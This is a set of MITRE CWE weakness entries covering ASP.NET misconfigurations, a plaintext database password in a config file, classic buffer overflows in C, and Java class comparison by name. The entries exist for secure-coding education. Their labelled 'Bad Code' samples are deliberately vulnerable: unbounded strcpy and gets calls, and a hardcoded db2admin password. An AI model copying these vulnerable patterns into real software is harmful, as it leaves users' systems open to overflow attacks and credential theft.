ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsASP.NET Misconfiguration: Creating Debug Binary
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-07-27CWE Content TeamMITREInternal
updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships

CWE-12: ASP.NET Misconfiguration: Missing Custom Error Page

Weakness ID: 12
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses.
+ Time of Introduction
  • Implementation
  • Operation
+ Applicable Platforms

Languages

.NET

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data

Default error pages gives detailed information about the error that occurred, and should not be used in production environments.

Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application.

+ Demonstrative Examples

Example 1

An insecure ASP.NET application setting:

(Bad Code)
Example Language: ASP.NET 
<customErrors mode="Off" />

Custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.

Here is a more secure setting:

(Good Code)
Example Language: ASP.NET 
<customErrors mode="RemoteOnly" />

Custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.

+ Potential Mitigations

Phases: System Configuration; Implementation

Handle exceptions appropriately in source code. The best practice is to use a custom error message. Make sure that the mode attribute is set to "RemoteOnly" in the web.config file as shown in the following example.

(Good Code)
 
<customErrors mode="RemoteOnly" />

The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. It should be configured to use a custom page as follows:

(Good Code)
 
<customErrors mode="On" defaultRedirect="YourErrorPage.htm" />

Phase: Architecture and Design

Do not attempt to process an error or attempt to mask it.

Phase: Implementation

Verify return values are correct and do not supply sensitive information about the system.

Phase: System Configuration

ASP .NET applications should be configured to use custom error pages instead of the framework default page.

+ Background Details

The mode attribute of the <customErrors> tag defines whether custom or default error pages are used.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory2Environment
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory10ASP.NET Environment Issues
Development Concepts (primary)699
ChildOfWeakness ClassWeakness Class756Missing Custom Error Page
Research Concepts (primary)1000
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsASP.NET Misconfiguration: Missing Custom Error Handling
+ References
M. Howard, D. LeBlanc and J. Viega. "19 Deadly Sins of Software Security". McGraw-Hill/Osborne. 2005.
OWASP, Fortify Software. "ASP.NET Misconfiguration: Missing Custom Error Handling". <http://www.owasp.org/index.php/ASP.NET_Misconfiguration:_Missing_Custom_Error_Handling>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, References, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes, Potential_Mitigations
2009-03-10CWE Content TeamMITREInternal
updated Name, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Background_Details, Common_Consequences, Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-03-10ASP.NET Misconfiguration: Missing Custom Error Handling

CWE-13: ASP.NET Misconfiguration: Password in Configuration File

Weakness ID: 13
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource making them an easy target for attackers.
+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Common Consequences
ScopeEffect
Access Control

Technical Impact: Gain privileges / assume identity

+ Demonstrative Examples

Example 1

The following excerpt from an XML configuration file defines a connectionString for connecting to a database.

(Bad Code)
Example Language: XML 
<connectionStrings>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;"
providerName="System.Data.Odbc" />
</connectionStrings>

The connectionString is in cleartext, allowing anyone who can read the file access to the database.

Example 2

The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in plaintext.

(Bad Code)
Example Language: ASP.NET 
...
<connectionStrings>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" />
</connectionStrings>
...

Username and password information should not be included in a configuration file or a properties file in plaintext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information.

+ Potential Mitigations

Phase: Implementation

Credentials stored in configuration files should be encrypted, Use standard APIs and industry accepted algorithms to encrypt the credentials stored in configuration files.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory2Environment
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory10ASP.NET Environment Issues
Development Concepts (primary)699
ChildOfWeakness VariantWeakness Variant260Password in Configuration File
Research Concepts (primary)1000
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsASP.NET Misconfiguration: Password in Configuration File
+ References
Microsoft Corporation. "How To: Encrypt Configuration Sections in ASP.NET 2.0 Using DPAPI". <http://msdn.microsoft.com/en-us/library/ms998280.aspx>.
Microsoft Corporation. "How To: Encrypt Configuration Sections in ASP.NET 2.0 Using RSA". <http://msdn.microsoft.com/en-us/library/ms998283.aspx>.
Microsoft Corporation. ".NET Framework Developer's Guide - Securing Connection Strings". <http://msdn.microsoft.com/en-us/library/89211k9b(VS.80).aspx>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, References, Taxonomy_Mappings
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Demonstrative_Examples
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships

CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

Weakness ID: 120
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Extended Description

A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the "classic" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.

+ Alternate Terms
buffer overrun:

Some prominent vendors and researchers use the term "buffer overrun," but most people use "buffer overflow."

Unbounded Transfer
+ Terminology Notes

Many issues that are now called "buffer overflows" are substantively different than the "classic" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

C

C++

Assembly

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (CPU)

Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.

Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges.

Effectiveness: High

Detection techniques for buffer-related errors are more mature than for most other weakness types.

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Manual Analysis

Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.

(Bad Code)
Example Language:
char last_name[20];
printf ("Enter your last name: ");
scanf ("%s", last_name);

The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters "Very_very_long_last_name" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total.

Example 2

The following code attempts to create a local copy of a buffer to perform some manipulations to the data.

(Bad Code)
Example Language:
void manipulate_string(char* string){
char buf[24];
strcpy(buf, string);
...
}

However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and blindly copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter.

Example 3

The excerpt below calls the gets() function in C, which is inherently unsafe.

(Bad Code)
Example Language:
char buf[24];
printf("Please enter your name and press <Enter>\n");
gets(buf);
...
}

However, the programmer uses the function gets() which is inherently unsafe because it blindly copies all input from STDIN to the buffer without restricting how much is copied. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition.

Example 4

In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.

(Bad Code)
Example Languages: C and C++ 
...
struct hostent *clienthp;
char hostname[MAX_LEN];

// create server socket, bind to server address and listen on socket
...

// accept client connections and process requests
int count = 0;
for (count = 0; count < MAX_CONNECTIONS; count++) {

int clientlen = sizeof(struct sockaddr_in);
int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr, &clientlen);

if (clientsocket >= 0) {
clienthp = gethostbyaddr((char*) &clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);
strcpy(hostname, clienthp->h_name);
logOutput("Accepted client connection from host ", hostname);

// process client request
...
close(clientsocket);
}
}
close(serversocket);
...

However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method.

+ Observed Examples
ReferenceDescription
buffer overflow using command with long argument
buffer overflow in local program using long environment variable
buffer overflow in comment characters, when product increments a counter for a ">" but does not decrement for "<"
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application's buffers.
+ Potential Mitigations

Phase: Requirements

Strategy: Language Selection

Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.

Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe.

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Examples include the Safe C String Library (SafeStr) by Messier and Viega [R.120.4], and the Strsafe.h library from Microsoft [R.120.3]. These libraries provide safer versions of overflow-prone string-handling functions.

This is not a complete solution, since many buffer overflows are not related to strings.

Phase: Build and Compilation

Strategy: Compilation or Build Hardening

Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.

For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice.

Effectiveness: Defense in Depth

This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Implementation

Consider adhering to the following rules when allocating and managing an application's memory:

  • Double check that your buffer is as large as you specify.

  • When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.

  • Check buffer boundaries if accessing the buffer in a loop and make sure you are not in danger of writing past the allocated space.

  • If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Operation

Strategy: Environment Hardening

Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.

Examples include Address Space Layout Randomization (ASLR) [R.120.5] [R.120.7] and Position-Independent Executables (PIE) [R.120.14].

Effectiveness: Defense in Depth

This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application.

Phase: Operation

Strategy: Environment Hardening

Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [R.120.7] [R.120.9].

Effectiveness: Defense in Depth

This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application.

Phases: Build and Compilation; Operation

Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution.

Phase: Implementation

Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.

Effectiveness: Moderate

This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131).

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.120.10]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Weakness Ordinalities
OrdinalityDescription
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004)711
ChildOfCategoryCategory726OWASP Top Ten 2004 Category A5 - Buffer Overflows
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory741CERT C Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory875CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory970SFP Secondary Cluster: Faulty Buffer Access
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness BaseWeakness Base123Write-what-where Condition
Research Concepts1000
ParentOfWeakness VariantWeakness Variant785Use of Path Manipulation Function without Maximum-sized Buffer
Development Concepts (primary)699
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base170Improper Null Termination
Research Concepts1000
CanFollowWeakness VariantWeakness Variant231Improper Handling of Extra Values
Research Concepts1000
CanFollowWeakness BaseWeakness Base242Use of Inherently Dangerous Function
Research Concepts1000
CanFollowWeakness BaseWeakness Base416Use After Free
Research Concepts1000
CanFollowWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
CanAlsoBeWeakness VariantWeakness Variant196Unsigned to Signed Conversion Error
Research Concepts1000
+ Relationship Notes

At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.

+ Affected Resources
  • Memory
+ Functional Areas
  • Memory Management
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERUnbounded Transfer ('classic overflow')
7 Pernicious KingdomsBuffer Overflow
CLASPBuffer overflow
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
OWASP Top Ten 2004A5CWE More SpecificBuffer Overflows
CERT C Secure CodingSTR35-CDo not copy data from an unbounded source to a fixed-length array
WASC7Buffer Overflow
CERT C++ Secure CodingSTR35-CPPDo not copy data from an unbounded source to a fixed-length array
Software Fault PatternsSFP8Faulty Buffer Access
+ White Box Definitions

A weakness where the code path includes a Buffer Write Operation such that:

1. the expected size of the buffer is greater than the actual size of the buffer where expected size is equal to the sum of the size of the data item and the position in the buffer

Where Buffer Write Operation is a statement that writes a data item of a certain size into a buffer at a certain position and at a certain index

+ References
[R.120.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127. 2nd Edition. Microsoft. 2002.
[R.120.2] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 5: Buffer Overruns." Page 89. McGraw-Hill. 2010.
[R.120.3] [REF-27] Microsoft. "Using the Strsafe.h Functions". <http://msdn.microsoft.com/en-us/library/ms647466.aspx>.
[R.120.4] [REF-26] Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.zork.org/safestr/>.
[R.120.5] [REF-22] Michael Howard. "Address Space Layout Randomization in Windows Vista". <http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx>.
[R.120.6] Arjan van de Ven. "Limiting buffer overflows with ExecShield". <http://www.redhat.com/magazine/009jul05/features/execshield/>.
[R.120.7] [REF-29] "PaX". <http://en.wikipedia.org/wiki/PaX>.
[R.120.8] Jason Lam. "Top 25 Series - Rank 3 - Classic Buffer Overflow". SANS Software Security Institute. 2010-03-02. <http://software-security.sans.org/blog/2010/03/02/top-25-series-rank-3-classic-buffer-overflow/>.
[R.120.9] [REF-25] Microsoft. "Understanding DEP as a mitigation technology part 1". <http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx>.
[R.120.10] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.120.11] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 3, "Nonexecutable Stack", Page 76.. 1st Edition. Addison Wesley. 2006.
[R.120.12] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 5, "Protection Mechanisms", Page 189.. 1st Edition. Addison Wesley. 2006.
[R.120.13] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "C String Handling", Page 388.. 1st Edition. Addison Wesley. 2006.
[R.120.14] [REF-37] Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-10CWE Content TeamMITREInternal
Changed name and description to more clearly emphasize the "classic" nature of the overflow.
2008-10-14CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes
2008-11-24CWE Content TeamMITREInternal
updated Other_Notes, Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Other_Notes, Potential_Mitigations, Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-10-14Unbounded Transfer ('Classic Buffer Overflow')

CWE-486: Comparison of Classes by Name

Weakness ID: 486
Abstraction: Variant
Status: Draft
Presentation Filter:
+ Description

Description Summary

The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.

Extended Description

If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

Java

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

If a program relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code.

+ Likelihood of Exploit

High

+ Demonstrative Examples

Example 1

In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names.

(Bad Code)
Example Language: Java 
if (inputClass.getClass().getName().equals("TrustedClassName")) {
// Do something assuming you trust inputClass
// ...
}

However, multiple classes can have the same name therefore comparing an object's class by name can allow untrusted classes of the same name as the trusted class to be use to execute unintended or incorrect code. To compare the class of an object to the intended class the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example.

(Good Code)
Example Language: Java 
if (inputClass.getClass() == TrustedClass.class) {
// Do something assuming you trust inputClass
// ...
}

Example 2

In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object's fields to determine if the objects are equivalent.

(Bad Code)
Example Language: Java 
public class TrustedClass {
...

@Override
public boolean equals(Object obj) {
boolean isEquals = false;

// first check to see if the object is of the same class
if (obj.getClass().getName().equals(this.getClass().getName())) {

// then compare object fields
...
if (...) {
isEquals = true;
}
}

return isEquals;
}

...
}

However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example using the name of the class to compare the class of objects can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example.

(Good Code)
Example Language: Java 
public boolean equals(Object obj) {
...

// first check to see if the object is of the same class
if (obj.getClass() == this.getClass()) {
...
}

...
}
+ Potential Mitigations

Phase: Implementation

Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory171Cleansing, Canonicalization, and Comparison Errors
Development Concepts699
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
Research Concepts1000
ChildOfWeakness ClassWeakness Class697Insufficient Comparison
Research Concepts (primary)1000
ChildOfCategoryCategory849CERT Java Secure Coding Section 04 - Object Orientation (OBJ)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory998SFP Secondary Cluster: Glitch in Computation
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
